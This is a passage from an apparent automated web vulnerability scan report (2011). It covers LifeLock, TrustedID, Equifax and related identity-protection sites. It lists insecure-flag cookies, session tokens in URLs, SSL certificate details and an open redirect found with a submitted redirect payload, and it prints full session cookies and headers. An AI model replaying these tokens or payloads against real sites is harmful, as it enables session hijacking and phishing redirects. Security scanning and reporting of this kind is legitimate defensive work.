Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:50 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:23:50 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=f6b470b0990eff9da9ecc49d049f8b7d5438784dc7b0156d4db397c6; Path=/
Vary: Accept-Encoding
Content-Length: 45537


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

10.7. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:53 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:18:53 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=a42f38caea98de40600af4324215a09331f2a75f23110e424db3969d; Path=/
Vary: Accept-Encoding
Content-Length: 3810


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

10.8. https://secure.lifelock.com/scripts/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/global.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:43 GMT
ETag: W/"3858-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:43 GMT
Connection: Keep-Alive
Content-Type: text/javascript
Set-Cookie: TS376161=58e3370f24dce77bbca52bcb5eaf49235438784dc7b0156d4db397bf; Path=/
Vary: Accept-Encoding
Content-Length: 3858

function loadJquery(){$(".info,.help,.infoTip").click(function(){return false}).tipsy({gravity:"w"});$(".help.lefty,.info.lefty").click(function(){return false}).tipsy({gravity:"e"});if($(".accept inp
...[SNIP]...

10.9. https://secure.lifelock.com/styles/login.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:56 GMT
ETag: W/"1705-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:33:56 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=f5b613a8c090fe06b99a29858ee6feec31f2a75f23110e424db396a0; Path=/
Vary: Accept-Encoding
Content-Length: 1705

body,form,ul,ol,li,table,td,p,h1,h2,h3,img{margin:0;padding:0;border:none;}body{color:#4b4640;font-size:12px;font-family:Verdana,Arial,Helvetica,sans-serif;text-align:center;background-color:#ececec;}
...[SNIP]...

10.10. https://secure.lifelock.com/styles/theme-lifelock.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/theme-lifelock.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/theme-lifelock.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"1587-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 1587

#header .logo{left:23px;top:23px;width:202px;height:56px;background-image:url(https://cdn.lifelock.com/assets/secure/images/lifelock-logo.png);}h2.step-1,h2.step-2,h2.step-3,h2.step-4{background-image
...[SNIP]...

10.11. https://secure.lifelock.com/styles/webstore.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/webstore.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/webstore.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"23213-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 23213

body,form,fieldset,legend,object,img,iframe,table,td,th,ul,li,ol,h1,h2,h3,h4,h5,h6,p,blockquote{margin:0;padding:0;border:0;vertical-align:middle;}table{border-collapse:collapse;border-spacing:0;}ul,o
...[SNIP]...

10.12. https://www.trustedid.com/idfide01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:34 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com
Set-Cookie: TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...

10.13. https://www.trustedid.com/suzeidprotector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...

11. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.2. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<br />
                   <a href="../portal/account-reset;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000"><i>
...[SNIP]...
<h3>Not a Member? <a href="../enrollment/;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000" name="linkWebstore">Enroll Now</a>
...[SNIP]...

11.3. https://www.econsumer.equifax.com/otc/landing.ehtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/landing.ehtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1
Host: www.econsumer.equifax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:12:19 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=857e5247922609777fdaaf17d37b; Path=/otc; Secure
Set-cookie: JROUTE=ush2; Path=/otc; Secure
Content-Length: 76392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Per
...[SNIP]...
</a> &nbsp;|&nbsp;
       <a href="sitepage.ehtml;jsessionid=857e5247922609777fdaaf17d37b:ush2?forward=elearning_credit14">FCRA</a>
...[SNIP]...

12. SSL certificate  previous  next
There are 5 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



12.1. https://secure.identityguard.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  secure.identityguard.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Mar 02 18:00:00 CST 2011
Valid to:  Sat Mar 02 17:59:59 CST 2013

12.2. https://secure.lifelock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.lifelock.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Jul 11 19:00:00 CDT 2010
Valid to:  Wed Jul 25 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.3. https://www.econsumer.equifax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.econsumer.equifax.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.econsumer.equifax.com
Issued by:  Thawte SSL CA
Valid from:  Mon Oct 25 19:00:00 CDT 2010
Valid to:  Sun Oct 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

12.4. https://www.pcisecuritystandards.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.pcisecuritystandards.org
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Oct 22 19:00:00 CDT 2009
Valid to:  Sun Oct 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.5. https://www.trustedid.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.trustedid.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Jan 17 18:00:00 CST 2010
Valid to:  Fri Feb 24 17:59:59 CST 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 was submitted in the adurl parameter. This caused a redirection to the following URL:

Issue background

